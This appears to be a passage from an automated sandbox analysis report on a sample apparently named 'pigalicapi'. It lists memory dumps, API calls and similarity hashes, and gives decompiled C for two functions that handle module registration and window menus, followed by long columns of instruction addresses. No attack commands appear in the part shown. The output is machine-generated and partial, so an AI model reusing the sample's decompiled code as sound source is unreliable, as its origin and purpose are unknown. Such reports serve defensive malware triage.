                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrcat$lstrlen$LoadStringTextWindowlstrcpy
                                                                                                                                                                                                                                                                                          • String ID: -
                                                                                                                                                                                                                                                                                          • API String ID: 730805527-3695764949
                                                                                                                                                                                                                                                                                          • Opcode ID: c405132fdbb59caa4718fb73d292f8785f79a89bb25a780743c6d25a590b2c78
                                                                                                                                                                                                                                                                                          • Instruction ID: aa831d02fe2aea5f6aa54211b0a6ce182ca482955e861c875ea3e63ed87fb0bd
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c405132fdbb59caa4718fb73d292f8785f79a89bb25a780743c6d25a590b2c78
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE118C71A0022CABC721EB64DC85EEAB7BCFF48304F004196E54997142DBB46E858FE5
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                                                                                                                          			E00804380(unsigned int __ecx, unsigned int __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                                                                                                          				char _v1314;
                                                                                                                                                                                                                                                                                          				short _v1316;
                                                                                                                                                                                                                                                                                          				char _v2356;
                                                                                                                                                                                                                                                                                          				unsigned int _v2360;
                                                                                                                                                                                                                                                                                          				char _v2364;
                                                                                                                                                                                                                                                                                          				char _v2368;
                                                                                                                                                                                                                                                                                          				CHAR* _v2372;
                                                                                                                                                                                                                                                                                          				CHAR* _v2376;
                                                                                                                                                                                                                                                                                          				CHAR* _v2380;
                                                                                                                                                                                                                                                                                          				CHAR* _v2384;
                                                                                                                                                                                                                                                                                          				CHAR* _v2388;
                                                                                                                                                                                                                                                                                          				struct _CRITICAL_SECTION _v2392;
                                                                                                                                                                                                                                                                                          				CHAR* _v2396;
                                                                                                                                                                                                                                                                                          				CHAR* _v2400;
                                                                                                                                                                                                                                                                                          				CHAR* _v2404;
                                                                                                                                                                                                                                                                                          				char _v2408;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _v2412;
                                                                                                                                                                                                                                                                                          				void* _v2424;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t70;
                                                                                                                                                                                                                                                                                          				void* _t75;
                                                                                                                                                                                                                                                                                          				unsigned int _t78;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t80;
                                                                                                                                                                                                                                                                                          				long _t81;
                                                                                                                                                                                                                                                                                          				int _t82;
                                                                                                                                                                                                                                                                                          				void* _t84;
                                                                                                                                                                                                                                                                                          				unsigned int _t90;
                                                                                                                                                                                                                                                                                          				signed int _t95;
                                                                                                                                                                                                                                                                                          				unsigned int _t97;
                                                                                                                                                                                                                                                                                          				unsigned int _t99;
                                                                                                                                                                                                                                                                                          				unsigned int _t103;
                                                                                                                                                                                                                                                                                          				void* _t110;
                                                                                                                                                                                                                                                                                          				signed int _t118;
                                                                                                                                                                                                                                                                                          				unsigned int _t145;
                                                                                                                                                                                                                                                                                          				void* _t148;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t149;
                                                                                                                                                                                                                                                                                          				signed int _t151;
                                                                                                                                                                                                                                                                                          				void* _t152;
                                                                                                                                                                                                                                                                                          				void* _t154;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t140 = __edx;
                                                                                                                                                                                                                                                                                          				_t70 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_v8 = _t70 ^ _t151;
                                                                                                                                                                                                                                                                                          				_v2392 = 0;
                                                                                                                                                                                                                                                                                          				_v2388 = 0;
                                                                                                                                                                                                                                                                                          				_v2384 = 0;
                                                                                                                                                                                                                                                                                          				_v2380 = 0;
                                                                                                                                                                                                                                                                                          				_v2376 = 0;
                                                                                                                                                                                                                                                                                          				_v2372 = 0;
                                                                                                                                                                                                                                                                                          				_t144 = __ecx;
                                                                                                                                                                                                                                                                                          				_v2360 = __ecx;
                                                                                                                                                                                                                                                                                          				_t146 = __edx;
                                                                                                                                                                                                                                                                                          				_v2408 = 0x822cf0;
                                                                                                                                                                                                                                                                                          				_v2404 = 0;
                                                                                                                                                                                                                                                                                          				_v2400 = 0;
                                                                                                                                                                                                                                                                                          				_v2396 = 0;
                                                                                                                                                                                                                                                                                          				_v2368 = 0;
                                                                                                                                                                                                                                                                                          				if(InitializeCriticalSectionAndSpinCount( &_v2392, 0) != 0) {
                                                                                                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                                                                                                          					_v2368 = 1;
                                                                                                                                                                                                                                                                                          					if(_t146 != 0) {
                                                                                                                                                                                                                                                                                          						_t116 =  *_t146;
                                                                                                                                                                                                                                                                                          						if( *_t146 != 0) {
                                                                                                                                                                                                                                                                                          							do {
                                                                                                                                                                                                                                                                                          								E00802050( *((intOrPtr*)(_t146 + 4)),  &_v2408,  &_v2408, _t116,  *((intOrPtr*)(_t146 + 4)));
                                                                                                                                                                                                                                                                                          								_t116 =  *(_t146 + 8);
                                                                                                                                                                                                                                                                                          								_t146 = _t146 + 8;
                                                                                                                                                                                                                                                                                          							} while (_t116 != 0);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t75 =  *_t144;
                                                                                                                                                                                                                                                                                          					_t140 =  *(_t75 + 0x14);
                                                                                                                                                                                                                                                                                          					_t146 =  *( *(_t75 + 0x14))( &_v2408);
                                                                                                                                                                                                                                                                                          					if(_t146 < 0) {
                                                                                                                                                                                                                                                                                          						L11:
                                                                                                                                                                                                                                                                                          						E00801F50();
                                                                                                                                                                                                                                                                                          						_t78 = _t146;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t80 =  *0x880c08;
                                                                                                                                                                                                                                                                                          						_v2364 = 0;
                                                                                                                                                                                                                                                                                          						_v2412 = _t80;
                                                                                                                                                                                                                                                                                          						_t81 = GetModuleFileNameA(_t80,  &_v268, 0x104);
                                                                                                                                                                                                                                                                                          						if(_t81 != 0) {
                                                                                                                                                                                                                                                                                          							if(_t81 != 0x104) {
                                                                                                                                                                                                                                                                                          								_t140 =  &_v268;
                                                                                                                                                                                                                                                                                          								_t82 = lstrlenA( &_v268);
                                                                                                                                                                                                                                                                                          								_t128 =  &_v2360;
                                                                                                                                                                                                                                                                                          								_v2360 = _t82 + 1;
                                                                                                                                                                                                                                                                                          								_t84 = E00801000(_t82 + 1,  &_v268,  &_v2360);
                                                                                                                                                                                                                                                                                          								_t154 = _t152 + 4;
                                                                                                                                                                                                                                                                                          								if(_t84 < 0) {
                                                                                                                                                                                                                                                                                          									L20:
                                                                                                                                                                                                                                                                                          									_t146 =  &_v2364;
                                                                                                                                                                                                                                                                                          									E0080A200( &_v2364);
                                                                                                                                                                                                                                                                                          									E00801F50();
                                                                                                                                                                                                                                                                                          									_t78 = 0x8007000e;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t145 = _v2360;
                                                                                                                                                                                                                                                                                          									if(_t145 > 0x400) {
                                                                                                                                                                                                                                                                                          										L18:
                                                                                                                                                                                                                                                                                          										_t148 = E0080A1D0(_t145, _t128, _t145,  &_v2364);
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_t110 = E00801030( &_v2360,  &_v268, _t145);
                                                                                                                                                                                                                                                                                          										_t154 = _t154 + 4;
                                                                                                                                                                                                                                                                                          										if(_t110 == 0) {
                                                                                                                                                                                                                                                                                          											goto L18;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											E0081ACA0(_t145);
                                                                                                                                                                                                                                                                                          											_t148 = _t154;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_t140 = _t145 >> 1;
                                                                                                                                                                                                                                                                                          									_t90 = E008010E0( &_v268, _t145 >> 1, _t148, 3);
                                                                                                                                                                                                                                                                                          									_t144 = _t90;
                                                                                                                                                                                                                                                                                          									if(_t90 != 0) {
                                                                                                                                                                                                                                                                                          										_t130 =  &_v2356;
                                                                                                                                                                                                                                                                                          										E00801620(_t144,  &_v2356, 0x208);
                                                                                                                                                                                                                                                                                          										_t149 = _v2412;
                                                                                                                                                                                                                                                                                          										if(_t149 == 0 || _t149 == GetModuleHandleA(0)) {
                                                                                                                                                                                                                                                                                          											_t140 =  &_v1314;
                                                                                                                                                                                                                                                                                          											_v1316 = 0x22;
                                                                                                                                                                                                                                                                                          											if(E00801140( &_v2356,  &_v1314) != 0) {
                                                                                                                                                                                                                                                                                          												_t95 = lstrlenW( &_v1316);
                                                                                                                                                                                                                                                                                          												_t140 = 0;
                                                                                                                                                                                                                                                                                          												 *((short*)(_t151 + _t95 * 2 - 0x520)) = 0x22;
                                                                                                                                                                                                                                                                                          												 *((short*)(_t151 + _t95 * 2 - 0x51e)) = 0;
                                                                                                                                                                                                                                                                                          												_push( &_v1316);
                                                                                                                                                                                                                                                                                          												_push(L"Module");
                                                                                                                                                                                                                                                                                          												_t130 =  &_v2408;
                                                                                                                                                                                                                                                                                          												_push( &_v2408);
                                                                                                                                                                                                                                                                                          												goto L27;
                                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                                          												_t146 =  &_v2364;
                                                                                                                                                                                                                                                                                          												E0080A200( &_v2364);
                                                                                                                                                                                                                                                                                          												E00801F50();
                                                                                                                                                                                                                                                                                          												_t78 = 0x80004005;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											_t140 =  &_v2356;
                                                                                                                                                                                                                                                                                          											_push( &_v2356);
                                                                                                                                                                                                                                                                                          											_push(L"Module");
                                                                                                                                                                                                                                                                                          											_push( &_v2408);
                                                                                                                                                                                                                                                                                          											L27:
                                                                                                                                                                                                                                                                                          											_t97 = E00802050(_t130, _t140);
                                                                                                                                                                                                                                                                                          											_v2360 = _t97;
                                                                                                                                                                                                                                                                                          											if(_t97 >= 0) {
                                                                                                                                                                                                                                                                                          												_t140 =  &_v2356;
                                                                                                                                                                                                                                                                                          												_t99 = E00802050(_t130,  &_v2356,  &_v2408, L"Module_Raw",  &_v2356);
                                                                                                                                                                                                                                                                                          												_v2360 = _t99;
                                                                                                                                                                                                                                                                                          												if(_t99 < 0) {
                                                                                                                                                                                                                                                                                          													goto L28;
                                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                                          													if(_a8 == 0) {
                                                                                                                                                                                                                                                                                          														_t103 = E008027A0( &_v2408,  &_v2356,  &_v2408, _t144, _a4);
                                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                                          														_t140 =  &_v2408;
                                                                                                                                                                                                                                                                                          														_t103 = E008024C0(_a4,  &_v2408,  &_v2408, _t144, _a4);
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          													_t146 =  &_v2364;
                                                                                                                                                                                                                                                                                          													_t144 = _t103;
                                                                                                                                                                                                                                                                                          													E0080A200( &_v2364);
                                                                                                                                                                                                                                                                                          													goto L34;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                                          												L28:
                                                                                                                                                                                                                                                                                          												_t146 =  &_v2364;
                                                                                                                                                                                                                                                                                          												E0080A200( &_v2364);
                                                                                                                                                                                                                                                                                          												E00801F50();
                                                                                                                                                                                                                                                                                          												_t78 = _v2360;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										goto L20;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t146 =  &_v2364;
                                                                                                                                                                                                                                                                                          								E0080A200( &_v2364);
                                                                                                                                                                                                                                                                                          								E00801F50();
                                                                                                                                                                                                                                                                                          								_t78 = 0x8007007a;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t146 = E008013E0();
                                                                                                                                                                                                                                                                                          							goto L11;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t118 = GetLastError();
                                                                                                                                                                                                                                                                                          					if(_t118 > 0) {
                                                                                                                                                                                                                                                                                          						_t118 = _t118 & 0x0000ffff | 0x80070000;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t144 = _t118;
                                                                                                                                                                                                                                                                                          					if(_t144 < 0) {
                                                                                                                                                                                                                                                                                          						L34:
                                                                                                                                                                                                                                                                                          						E00801F50();
                                                                                                                                                                                                                                                                                          						_t78 = _t144;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t144 = _v2360;
                                                                                                                                                                                                                                                                                          						goto L5;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return E008159E6(_t78, 0, _v8 ^ _t151, _t140, _t144, _t146);
                                                                                                                                                                                                                                                                                          			}














































                                                                                                                                                                                                                                                                                          0x00804380
                                                                                                                                                                                                                                                                                          0x00804389
                                                                                                                                                                                                                                                                                          0x00804390
                                                                                                                                                                                                                                                                                          0x0080439a
                                                                                                                                                                                                                                                                                          0x008043a0
                                                                                                                                                                                                                                                                                          0x008043a6
                                                                                                                                                                                                                                                                                          0x008043ac
                                                                                                                                                                                                                                                                                          0x008043b2
                                                                                                                                                                                                                                                                                          0x008043b8
                                                                                                                                                                                                                                                                                          0x008043c5
                                                                                                                                                                                                                                                                                          0x008043c8
                                                                                                                                                                                                                                                                                          0x008043ce
                                                                                                                                                                                                                                                                                          0x008043d0
                                                                                                                                                                                                                                                                                          0x008043da
                                                                                                                                                                                                                                                                                          0x008043e0
                                                                                                                                                                                                                                                                                          0x008043e6
                                                                                                                                                                                                                                                                                          0x008043ec
                                                                                                                                                                                                                                                                                          0x008043fa
                                                                                                                                                                                                                                                                                          0x00804420
                                                                                                                                                                                                                                                                                          0x00804420
                                                                                                                                                                                                                                                                                          0x00804429
                                                                                                                                                                                                                                                                                          0x0080442b
                                                                                                                                                                                                                                                                                          0x0080442f
                                                                                                                                                                                                                                                                                          0x00804431
                                                                                                                                                                                                                                                                                          0x0080443d
                                                                                                                                                                                                                                                                                          0x00804442
                                                                                                                                                                                                                                                                                          0x00804445
                                                                                                                                                                                                                                                                                          0x00804448
                                                                                                                                                                                                                                                                                          0x00804431
                                                                                                                                                                                                                                                                                          0x0080442f
                                                                                                                                                                                                                                                                                          0x0080444c
                                                                                                                                                                                                                                                                                          0x0080444e
                                                                                                                                                                                                                                                                                          0x0080445c
                                                                                                                                                                                                                                                                                          0x00804460
                                                                                                                                                                                                                                                                                          0x00804491
                                                                                                                                                                                                                                                                                          0x00804497
                                                                                                                                                                                                                                                                                          0x0080449c
                                                                                                                                                                                                                                                                                          0x00804462
                                                                                                                                                                                                                                                                                          0x00804462
                                                                                                                                                                                                                                                                                          0x00804474
                                                                                                                                                                                                                                                                                          0x0080447a
                                                                                                                                                                                                                                                                                          0x00804480
                                                                                                                                                                                                                                                                                          0x00804488
                                                                                                                                                                                                                                                                                          0x008044a8
                                                                                                                                                                                                                                                                                          0x008044ca
                                                                                                                                                                                                                                                                                          0x008044d1
                                                                                                                                                                                                                                                                                          0x008044d7
                                                                                                                                                                                                                                                                                          0x008044df
                                                                                                                                                                                                                                                                                          0x008044e5
                                                                                                                                                                                                                                                                                          0x008044ea
                                                                                                                                                                                                                                                                                          0x008044ef
                                                                                                                                                                                                                                                                                          0x0080453d
                                                                                                                                                                                                                                                                                          0x0080453d
                                                                                                                                                                                                                                                                                          0x00804543
                                                                                                                                                                                                                                                                                          0x0080454e
                                                                                                                                                                                                                                                                                          0x00804553
                                                                                                                                                                                                                                                                                          0x008044f1
                                                                                                                                                                                                                                                                                          0x008044f1
                                                                                                                                                                                                                                                                                          0x008044fd
                                                                                                                                                                                                                                                                                          0x00804517
                                                                                                                                                                                                                                                                                          0x00804524
                                                                                                                                                                                                                                                                                          0x008044ff
                                                                                                                                                                                                                                                                                          0x00804500
                                                                                                                                                                                                                                                                                          0x00804505
                                                                                                                                                                                                                                                                                          0x0080450a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080450c
                                                                                                                                                                                                                                                                                          0x0080450e
                                                                                                                                                                                                                                                                                          0x00804513
                                                                                                                                                                                                                                                                                          0x00804513
                                                                                                                                                                                                                                                                                          0x0080450a
                                                                                                                                                                                                                                                                                          0x0080452a
                                                                                                                                                                                                                                                                                          0x00804532
                                                                                                                                                                                                                                                                                          0x00804537
                                                                                                                                                                                                                                                                                          0x0080453b
                                                                                                                                                                                                                                                                                          0x00804564
                                                                                                                                                                                                                                                                                          0x0080456a
                                                                                                                                                                                                                                                                                          0x0080456f
                                                                                                                                                                                                                                                                                          0x00804577
                                                                                                                                                                                                                                                                                          0x00804599
                                                                                                                                                                                                                                                                                          0x008045ab
                                                                                                                                                                                                                                                                                          0x008045bc
                                                                                                                                                                                                                                                                                          0x008045e5
                                                                                                                                                                                                                                                                                          0x008045f0
                                                                                                                                                                                                                                                                                          0x008045f2
                                                                                                                                                                                                                                                                                          0x008045fa
                                                                                                                                                                                                                                                                                          0x00804608
                                                                                                                                                                                                                                                                                          0x00804609
                                                                                                                                                                                                                                                                                          0x0080460e
                                                                                                                                                                                                                                                                                          0x00804614
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008045be
                                                                                                                                                                                                                                                                                          0x008045be
                                                                                                                                                                                                                                                                                          0x008045c4
                                                                                                                                                                                                                                                                                          0x008045cf
                                                                                                                                                                                                                                                                                          0x008045d4
                                                                                                                                                                                                                                                                                          0x008045d4
                                                                                                                                                                                                                                                                                          0x00804584
                                                                                                                                                                                                                                                                                          0x00804584
                                                                                                                                                                                                                                                                                          0x0080458a
                                                                                                                                                                                                                                                                                          0x0080458b
                                                                                                                                                                                                                                                                                          0x00804596
                                                                                                                                                                                                                                                                                          0x00804615
                                                                                                                                                                                                                                                                                          0x00804615
                                                                                                                                                                                                                                                                                          0x0080461a
                                                                                                                                                                                                                                                                                          0x00804622
                                                                                                                                                                                                                                                                                          0x00804642
                                                                                                                                                                                                                                                                                          0x00804655
                                                                                                                                                                                                                                                                                          0x0080465a
                                                                                                                                                                                                                                                                                          0x00804662
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00804664
                                                                                                                                                                                                                                                                                          0x00804667
                                                                                                                                                                                                                                                                                          0x00804688
                                                                                                                                                                                                                                                                                          0x00804669
                                                                                                                                                                                                                                                                                          0x0080466e
                                                                                                                                                                                                                                                                                          0x00804675
                                                                                                                                                                                                                                                                                          0x00804675
                                                                                                                                                                                                                                                                                          0x0080468d
                                                                                                                                                                                                                                                                                          0x00804693
                                                                                                                                                                                                                                                                                          0x00804695
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00804695
                                                                                                                                                                                                                                                                                          0x00804624
                                                                                                                                                                                                                                                                                          0x00804624
                                                                                                                                                                                                                                                                                          0x00804624
                                                                                                                                                                                                                                                                                          0x0080462a
                                                                                                                                                                                                                                                                                          0x00804635
                                                                                                                                                                                                                                                                                          0x0080463a
                                                                                                                                                                                                                                                                                          0x0080463a
                                                                                                                                                                                                                                                                                          0x00804622
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080453b
                                                                                                                                                                                                                                                                                          0x008044aa
                                                                                                                                                                                                                                                                                          0x008044aa
                                                                                                                                                                                                                                                                                          0x008044b0
                                                                                                                                                                                                                                                                                          0x008044bb
                                                                                                                                                                                                                                                                                          0x008044c0
                                                                                                                                                                                                                                                                                          0x008044c0
                                                                                                                                                                                                                                                                                          0x0080448a
                                                                                                                                                                                                                                                                                          0x0080448f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080448f
                                                                                                                                                                                                                                                                                          0x00804488
                                                                                                                                                                                                                                                                                          0x008043fc
                                                                                                                                                                                                                                                                                          0x008043fc
                                                                                                                                                                                                                                                                                          0x00804404
                                                                                                                                                                                                                                                                                          0x0080440b
                                                                                                                                                                                                                                                                                          0x0080440b
                                                                                                                                                                                                                                                                                          0x00804410
                                                                                                                                                                                                                                                                                          0x00804414
                                                                                                                                                                                                                                                                                          0x0080469a
                                                                                                                                                                                                                                                                                          0x008046a0
                                                                                                                                                                                                                                                                                          0x008046a5
                                                                                                                                                                                                                                                                                          0x0080441a
                                                                                                                                                                                                                                                                                          0x0080441a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080441a
                                                                                                                                                                                                                                                                                          0x00804414
                                                                                                                                                                                                                                                                                          0x008046bd

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 008043F2
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 008043FC
                                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00800000,?,00000104), ref: 00804480
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 008044D1
                                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0080457A
                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 008045E5
                                                                                                                                                                                                                                                                                            • Part of subcall function 00802050: EnterCriticalSection.KERNEL32(?,DA7E2511,?,?,00800000,00804281,00822CF0,Module,?), ref: 0080209B
                                                                                                                                                                                                                                                                                            • Part of subcall function 00802050: lstrlenW.KERNEL32(00822CF0), ref: 008020A8
                                                                                                                                                                                                                                                                                            • Part of subcall function 008027A0: lstrlenW.KERNEL32(REGISTRY,DA7E2511,00000000,?,00000000,?,00822CF0,Module,?), ref: 008027D8
                                                                                                                                                                                                                                                                                            • Part of subcall function 008027A0: WideCharToMultiByte.KERNEL32(00000003,00000000,REGISTRY,000000FF,00000008,00000001,00000000,00000000), ref: 00802857
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrlen$CriticalModuleSection$ByteCharCountEnterErrorFileHandleInitializeLastMultiNameSpinWide
                                                                                                                                                                                                                                                                                          • String ID: Module$Module_Raw
                                                                                                                                                                                                                                                                                          • API String ID: 1217862086-3885325121
                                                                                                                                                                                                                                                                                          • Opcode ID: e06cf84aaa7b75508ea4a1e5f8aeeb0adab066bc3cc7ed05837e015b3d5b094d
                                                                                                                                                                                                                                                                                          • Instruction ID: c5fe29ffa76d957270672e92e976c230fe85bbe7082f5ed6b5d53aba37b7092e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e06cf84aaa7b75508ea4a1e5f8aeeb0adab066bc3cc7ed05837e015b3d5b094d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 509164B19026289BEBA0DB58CC85BEE73B4FF94310F0005A9E619E7192EB715F85CF51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                                                                                                          			E0080F2D0(long* __ebx, struct HWND__* __ecx) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                                          				signed char _v20;
                                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                                          				void* _v28;
                                                                                                                                                                                                                                                                                          				signed int _v32;
                                                                                                                                                                                                                                                                                          				void* _v36;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t37;
                                                                                                                                                                                                                                                                                          				unsigned int _t39;
                                                                                                                                                                                                                                                                                          				signed short _t41;
                                                                                                                                                                                                                                                                                          				intOrPtr _t52;
                                                                                                                                                                                                                                                                                          				signed int _t57;
                                                                                                                                                                                                                                                                                          				long* _t63;
                                                                                                                                                                                                                                                                                          				struct tagPOINT _t65;
                                                                                                                                                                                                                                                                                          				int _t78;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t80;
                                                                                                                                                                                                                                                                                          				signed int _t81;
                                                                                                                                                                                                                                                                                          				void* _t84;
                                                                                                                                                                                                                                                                                          				void* _t85;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t63 = __ebx;
                                                                                                                                                                                                                                                                                          				_t37 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_v8 = _t37 ^ _t81;
                                                                                                                                                                                                                                                                                          				_t80 = __ecx;
                                                                                                                                                                                                                                                                                          				_t39 = GetMessagePos();
                                                                                                                                                                                                                                                                                          				_t65 = _t39;
                                                                                                                                                                                                                                                                                          				_t41 = _t39 >> 0x10;
                                                                                                                                                                                                                                                                                          				 *__ebx = 0;
                                                                                                                                                                                                                                                                                          				_v36 = _t65;
                                                                                                                                                                                                                                                                                          				_v32 = _t41;
                                                                                                                                                                                                                                                                                          				if(( *(_t80 + 0x84) & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                          					ScreenToClient( *(_t80 + 4),  &_v36);
                                                                                                                                                                                                                                                                                          					L14:
                                                                                                                                                                                                                                                                                          					 *0x880bc0 = _v36;
                                                                                                                                                                                                                                                                                          					 *0x880bc4 = _v32;
                                                                                                                                                                                                                                                                                          					return E008159E6(0, _t63, _v8 ^ _t81, _v32, _t78, _t80);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t78 =  *(_t80 + 4);
                                                                                                                                                                                                                                                                                          				_push(_t41);
                                                                                                                                                                                                                                                                                          				if(WindowFromPoint(_t65) != _t78) {
                                                                                                                                                                                                                                                                                          					goto L14;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				ScreenToClient(_t78,  &_v36);
                                                                                                                                                                                                                                                                                          				_t78 = SendMessageA( *(_t80 + 4), 0x445, 0,  &_v36);
                                                                                                                                                                                                                                                                                          				_t84 = _v36 -  *0x880bc0; // 0xffffffff
                                                                                                                                                                                                                                                                                          				if(_t84 != 0) {
                                                                                                                                                                                                                                                                                          					L4:
                                                                                                                                                                                                                                                                                          					if(_t78 >= 0 && _t78 < GetMenuItemCount( *(_t80 + 0x44))) {
                                                                                                                                                                                                                                                                                          						_t52 =  *((intOrPtr*)(_t80 + 0x88));
                                                                                                                                                                                                                                                                                          						if(_t78 != _t52 && _t52 != 0xffffffff) {
